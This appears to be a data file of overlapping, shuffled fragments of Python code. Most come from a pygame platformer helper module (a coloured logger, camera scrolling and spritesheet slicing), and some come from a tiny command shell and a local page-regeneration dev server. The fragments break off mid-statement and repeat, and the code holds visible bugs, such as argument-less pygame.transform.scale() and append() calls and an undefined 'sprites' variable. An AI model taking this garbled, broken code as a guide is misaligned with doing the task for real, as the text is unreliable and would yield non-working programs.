sprite_width row_images = [] for row_num in range(rows): # loop", "sprite_height sprite_rect = (x_pos, y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw ==", "\"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO]", "sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw == empty_image: continue row_images.append(sprite) rows.append(row_images) return rows", "### ############################# class Scrolling: scroll_x: float = 0 scroll_y: float = 0 max_scroll_x:", "elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites =", "0 max_scroll_x: float = 0 max_scroll_y: float = 0 @staticmethod def setup_scrolling(map_size, tile_size,", "def add_extra_sprites(self): for i in self.dict: copied_sprites = self.dict[i].copy() squashed_sprites = [] stretched_sprites", "by multiplying # the column that its on by the width x_pos =", "= 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis if", "0 scroll_y: float = 0 max_scroll_x: float = 0 max_scroll_y: float = 0", "rows y_pos = row_num * sprite_height sprite_rect = (x_pos, y_pos, sprite_width, sprite_height) sprite", "Scroll handling class ### ############################# class Scrolling: scroll_x: float = 0 scroll_y: float", "* sprite_width row_images = [] for row_num in range(rows): # loop through the", "= Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def", "get the images from the spritesheet cols is number of columns rows is", "number of columns rows is number of rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width", "warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error:", "@staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll", "tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size) - (screen_size[1]) - 50 Logger.log(", "scroll_y: float = 0 max_scroll_x: float = 0 max_scroll_y: float = 0 @staticmethod", "of columns rows is number of rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width =", "= sprites[i] def add_extra_sprites(self): for i in self.dict: copied_sprites = self.dict[i].copy() squashed_sprites =", "column that its on by the width x_pos = col_num * sprite_width row_images", "= Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0 elif", "\"\"\" spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols sprite_height = spritesheet.get_height() /", "def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x += ( player_pos[0] -", "pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols sprite_height = spritesheet.get_height() / rows empty_image =", "= pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop through the number of columns for", "in range(rows): # loop through the number of rows y_pos = row_num *", "str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str):", "for i in self.dict: copied_sprites = self.dict[i].copy() squashed_sprites = [] stretched_sprites = []", "rows = [] # loop through the number of columns for col_num in", "cols sprite_height = spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] #", "axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x", "= spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop through", "Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y", "cols, rows): \"\"\" get the images from the spritesheet cols is number of", "rows is number of rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width() /", "def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling", "= pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols sprite_height = spritesheet.get_height() / rows empty_image", "{message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ###", "= { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def", "width x_pos = col_num * sprite_width row_images = [] for row_num in range(rows):", "number of rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols sprite_height", "scroll_offset): \"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x -", "empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop through the number of columns", "/ rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop through the number", "sheepy0125 02/10/2021 \"\"\" from pathlib import Path ############### ### Globals ### ############### ROOT_PATH:", "if Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x =", "# loop through the number of rows y_pos = row_num * sprite_height sprite_rect", "ease\"\"\" colors: dict = { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\",", "Tools for Some Platformer Game Created by sheepy0125 02/10/2021 \"\"\" from pathlib import", "def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line", "self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for i in range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def", "Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names):", "Game Created by sheepy0125 02/10/2021 \"\"\" from pathlib import Path ############### ### Globals", "y_pos = row_num * sprite_height sprite_rect = (x_pos, y_pos, sprite_width, sprite_height) sprite =", "fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\"", "02/10/2021 \"\"\" from pathlib import Path ############### ### Globals ### ############### ROOT_PATH: Path", "colors: dict = { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", }", "print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL]", "tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y =", "def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for i in", "# Center player Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x - scroll_offset[0] ) /", "rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop through the number of", "Scrolling.max_scroll_y = (map_size[1] * tile_size) - (screen_size[1]) - 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x},", ") / 10 Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y - scroll_offset[1] ) /", "### Globals ### ############### ROOT_PATH: Path = Path(__file__).parent.parent #################### ### Logger class ###", "row_num * sprite_height sprite_rect = (x_pos, y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if", "scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size)", "Logger class ### #################### class Logger: \"\"\"Log messages with ease\"\"\" colors: dict =", "### Logger class ### #################### class Logger: \"\"\"Log messages with ease\"\"\" colors: dict", "in self.dict: copied_sprites = self.dict[i].copy() squashed_sprites = [] stretched_sprites = [] for i", "0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y", "# the column that its on by the width x_pos = col_num *", "get the x position of the sprite by multiplying # the column that", "float = 0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0]", "Logger: \"\"\"Log messages with ease\"\"\" colors: dict = { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\",", "- (screen_size[1]) - 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos,", "<= 0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class", "\"\"\" get the images from the spritesheet cols is number of columns rows", "= self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for i in range(len(sprites)): self.dict[dict_names[i]] =", "off the map # X axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0", "update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x", "<= 0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x #", "the x position of the sprite by multiplying # the column that its", "Y axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y:", "the map # X axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0 elif", "of rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols sprite_height =", "scrolling\"\"\" # Center player Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x - scroll_offset[0] )", "sprite_width = spritesheet.get_width() / cols sprite_height = spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw", "scroll_offset[0] ) / 10 Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y - scroll_offset[1] )", "stretched_sprites = [] for i in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def", "of rows y_pos = row_num * sprite_height sprite_rect = (x_pos, y_pos, sprite_width, sprite_height)", "Scrolling.scroll_y - scroll_offset[1] ) / 10 # Don't allow scrolling off the map", "@staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod", "sprite by multiplying # the column that its on by the width x_pos", "Scrolling.scroll_y = 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def", "Don't allow scrolling off the map # X axis if Scrolling.scroll_x <= 0:", "# Don't allow scrolling off the map # X axis if Scrolling.scroll_x <=", "of columns for col_num in range(cols): # get the x position of the", "Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" #", "f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling class ### ############################# class", "= self.dict[i].copy() squashed_sprites = [] stretched_sprites = [] for i in copied_sprites: squashed_sprite", "stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the images from the spritesheet cols", "log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling class", "position of the sprite by multiplying # the column that its on by", "= row_num * sprite_height sprite_rect = (x_pos, y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect)", "#################### ### Logger class ### #################### class Logger: \"\"\"Log messages with ease\"\"\" colors:", "import Path ############### ### Globals ### ############### ROOT_PATH: Path = Path(__file__).parent.parent #################### ###", "Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling class ###", "rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols sprite_height = spritesheet.get_height()", "* sprite_height sprite_rect = (x_pos, y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw", "by sheepy0125 02/10/2021 \"\"\" from pathlib import Path ############### ### Globals ### ###############", "self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for i in self.dict: copied_sprites = self.dict[i].copy() squashed_sprites", "on by the width x_pos = col_num * sprite_width row_images = [] for", "player_pos[0] - Scrolling.scroll_x - scroll_offset[0] ) / 10 Scrolling.scroll_y += ( player_pos[1] -", "Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0", "= [] for i in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path,", "\"\"\" from pathlib import Path ############### ### Globals ### ############### ROOT_PATH: Path =", "= Path(__file__).parent.parent #################### ### Logger class ### #################### class Logger: \"\"\"Log messages with", "with ease\"\"\" colors: dict = { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\":", "{message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\")", "pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop through the number of columns for col_num", "\"\\033[0m\", } @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN]", "images from the spritesheet cols is number of columns rows is number of", "the number of columns for col_num in range(cols): # get the x position", "i in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\"", "map # X axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x", "f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center", "0 max_scroll_y: float = 0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x", "the images from the spritesheet cols is number of columns rows is number", "elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y <=", "float = 0 scroll_y: float = 0 max_scroll_x: float = 0 max_scroll_y: float", ") ############################# ### Scroll handling class ### ############################# class Scrolling: scroll_x: float =", "in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get", "sprite_rect = (x_pos, y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw == empty_image:", "# loop through the number of columns for col_num in range(cols): # get", "\"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message:", "- Scrolling.scroll_x - scroll_offset[0] ) / 10 Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y", "def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the images from the spritesheet cols is", "# Y axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y >=", "sprite_height = spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop", "+= ( player_pos[0] - Scrolling.scroll_x - scroll_offset[0] ) / 10 Scrolling.scroll_y += (", "allow scrolling off the map # X axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x", "dict = { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod", "Scrolling: scroll_x: float = 0 scroll_y: float = 0 max_scroll_x: float = 0", "class Scrolling: scroll_x: float = 0 scroll_y: float = 0 max_scroll_x: float =", "(screen_size[1]) - 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset):", "{ \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def log(message:", "tile_size) - (screen_size[1]) - 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def", "self.dict[i].copy() squashed_sprites = [] stretched_sprites = [] for i in copied_sprites: squashed_sprite =", "__init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for i in range(len(sprites)):", "= (map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size) - (screen_size[1])", "({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x", "in range(cols): # get the x position of the sprite by multiplying #", "copied_sprites = self.dict[i].copy() squashed_sprites = [] stretched_sprites = [] for i in copied_sprites:", "str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception):", "of the sprite by multiplying # the column that its on by the", "Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows)", "= spritesheet.get_width() / cols sprite_height = spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows", "= pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the images from", "squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the images from the spritesheet", "\"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod", ") / 10 # Don't allow scrolling off the map # X axis", "spritesheet.get_width() / cols sprite_height = spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows =", "rows): \"\"\" get the images from the spritesheet cols is number of columns", "in range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for i in self.dict: copied_sprites =", "- Scrolling.scroll_y - scroll_offset[1] ) / 10 # Don't allow scrolling off the", "screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1]", "the spritesheet cols is number of columns rows is number of rows \"\"\"", "10 # Don't allow scrolling off the map # X axis if Scrolling.scroll_x", "pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the images from the", "x position of the sprite by multiplying # the column that its on", "= 0 scroll_y: float = 0 max_scroll_x: float = 0 max_scroll_y: float =", "self.load_dict(dict_names) def load_dict(self,dict_names): for i in range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for", "i in self.dict: copied_sprites = self.dict[i].copy() squashed_sprites = [] stretched_sprites = [] for", "loop through the number of columns for col_num in range(cols): # get the", "range(cols): # get the x position of the sprite by multiplying # the", "if Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y =", "row_num in range(rows): # loop through the number of rows y_pos = row_num", "self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for i in range(len(sprites)): self.dict[dict_names[i]] = sprites[i]", "0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size)", "Path(__file__).parent.parent #################### ### Logger class ### #################### class Logger: \"\"\"Log messages with ease\"\"\"", "def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size) - (screen_size[0])", "Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y - scroll_offset[1] ) / 10 # Don't", "max_scroll_y: float = 0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x =", "columns for col_num in range(cols): # get the x position of the sprite", "X axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x:", ">= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y", "Some Platformer Game Created by sheepy0125 02/10/2021 \"\"\" from pathlib import Path ###############", "Path ############### ### Globals ### ############### ROOT_PATH: Path = Path(__file__).parent.parent #################### ### Logger", "spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop through the", "player Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x - scroll_offset[0] ) / 10 Scrolling.scroll_y", "Scrolling.max_scroll_x = (map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size) -", "log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message:", "@staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size) -", "from pathlib import Path ############### ### Globals ### ############### ROOT_PATH: Path = Path(__file__).parent.parent", "- 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update" ]
[ "sys path = ['~'] def run() -> None: while True: input_value = input('LittleFather('", "interpret(args: list) -> bool: command = args[0] args = [] if len(args) ==", "args[0] args = [] if len(args) == 1 else args[1:] if command in", "Coms.commands: Coms.commands[command].execute(args) elif command == 'exit': return False else: print('unknown command') return True", "break def custom_input(): return input('> ') def interpret(args: list) -> bool: command =", "= ['~'] def run() -> None: while True: input_value = input('LittleFather(' + '/'.join(path)", "if command in Coms.commands: Coms.commands[command].execute(args) elif command == 'exit': return False else: print('unknown", "utf-8 import Coms import sys path = ['~'] def run() -> None: while", "if len(input_value) == 0: continue if not interpret(input_value): break def custom_input(): return input('>", "interpret(input_value): break def custom_input(): return input('> ') def interpret(args: list) -> bool: command", "= [] if len(args) == 1 else args[1:] if command in Coms.commands: Coms.commands[command].execute(args)", "') if len(input_value) == 0: continue if not interpret(input_value): break def custom_input(): return", "# coding: utf-8 import Coms import sys path = ['~'] def run() ->", "custom_input(): return input('> ') def interpret(args: list) -> bool: command = args[0] args", "+ '/'.join(path) + ') $ ').split(' ') if len(input_value) == 0: continue if", "$ ').split(' ') if len(input_value) == 0: continue if not interpret(input_value): break def", "import sys path = ['~'] def run() -> None: while True: input_value =", "def run() -> None: while True: input_value = input('LittleFather(' + '/'.join(path) + ')", "input('LittleFather(' + '/'.join(path) + ') $ ').split(' ') if len(input_value) == 0: continue", "len(input_value) == 0: continue if not interpret(input_value): break def custom_input(): return input('> ')", "path = ['~'] def run() -> None: while True: input_value = input('LittleFather(' +", "if not interpret(input_value): break def custom_input(): return input('> ') def interpret(args: list) ->", "if len(args) == 1 else args[1:] if command in Coms.commands: Coms.commands[command].execute(args) elif command", "bool: command = args[0] args = [] if len(args) == 1 else args[1:]", "list) -> bool: command = args[0] args = [] if len(args) == 1", "1 else args[1:] if command in Coms.commands: Coms.commands[command].execute(args) elif command == 'exit': return", "= args[0] args = [] if len(args) == 1 else args[1:] if command", "command in Coms.commands: Coms.commands[command].execute(args) elif command == 'exit': return False else: print('unknown command')", "continue if not interpret(input_value): break def custom_input(): return input('> ') def interpret(args: list)", "def custom_input(): return input('> ') def interpret(args: list) -> bool: command = args[0]", "-> None: while True: input_value = input('LittleFather(' + '/'.join(path) + ') $ ').split('", "== 1 else args[1:] if command in Coms.commands: Coms.commands[command].execute(args) elif command == 'exit':", "-> bool: command = args[0] args = [] if len(args) == 1 else", "else args[1:] if command in Coms.commands: Coms.commands[command].execute(args) elif command == 'exit': return False", "in Coms.commands: Coms.commands[command].execute(args) elif command == 'exit': return False else: print('unknown command') return", "not interpret(input_value): break def custom_input(): return input('> ') def interpret(args: list) -> bool:", "<gh_stars>1-10 #!/usr/local/bin/python # coding: utf-8 import Coms import sys path = ['~'] def", "') $ ').split(' ') if len(input_value) == 0: continue if not interpret(input_value): break", "None: while True: input_value = input('LittleFather(' + '/'.join(path) + ') $ ').split(' ')", "import Coms import sys path = ['~'] def run() -> None: while True:", "True: input_value = input('LittleFather(' + '/'.join(path) + ') $ ').split(' ') if len(input_value)", "args[1:] if command in Coms.commands: Coms.commands[command].execute(args) elif command == 'exit': return False else:", "coding: utf-8 import Coms import sys path = ['~'] def run() -> None:", "'/'.join(path) + ') $ ').split(' ') if len(input_value) == 0: continue if not", "').split(' ') if len(input_value) == 0: continue if not interpret(input_value): break def custom_input():", "def interpret(args: list) -> bool: command = args[0] args = [] if len(args)", "len(args) == 1 else args[1:] if command in Coms.commands: Coms.commands[command].execute(args) elif command ==", "== 0: continue if not interpret(input_value): break def custom_input(): return input('> ') def", "input('> ') def interpret(args: list) -> bool: command = args[0] args = []", "Coms import sys path = ['~'] def run() -> None: while True: input_value", "run() -> None: while True: input_value = input('LittleFather(' + '/'.join(path) + ') $", "['~'] def run() -> None: while True: input_value = input('LittleFather(' + '/'.join(path) +", "while True: input_value = input('LittleFather(' + '/'.join(path) + ') $ ').split(' ') if", "args = [] if len(args) == 1 else args[1:] if command in Coms.commands:", "= input('LittleFather(' + '/'.join(path) + ') $ ').split(' ') if len(input_value) == 0:", "#!/usr/local/bin/python # coding: utf-8 import Coms import sys path = ['~'] def run()", "') def interpret(args: list) -> bool: command = args[0] args = [] if", "0: continue if not interpret(input_value): break def custom_input(): return input('> ') def interpret(args:", "[] if len(args) == 1 else args[1:] if command in Coms.commands: Coms.commands[command].execute(args) elif", "return input('> ') def interpret(args: list) -> bool: command = args[0] args =", "command = args[0] args = [] if len(args) == 1 else args[1:] if", "+ ') $ ').split(' ') if len(input_value) == 0: continue if not interpret(input_value):", "input_value = input('LittleFather(' + '/'.join(path) + ') $ ').split(' ') if len(input_value) ==" ]
[]
[ "empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update()", "last_modified_time = modified_time os.system('python create_page.py') print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time)) # refreshes", "creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP handler class", "webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running, your site will now be automatically regenerated", "\"none\"; function loadCommands(filename) { $.get(filename, function(data, textStatus) { if (textStatus == 'success') {", "{ if (lastRefreshToken !== lines[i]) { lastRefreshToken = lines[i]; var iframe = document.getElementsByName('content_window')[0];", "addons_server addons_server.on_update() # removes existing commands file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page =", "import os import time import webbrowser import threading from addons.addons_server import * from", "margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe> </body>", "web browser and writes other commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: #", "new SwiftPage generated: \"+str(last_modified_time)) # refreshes web browser and writes other commands commands", "'success') { var lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for", "local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) 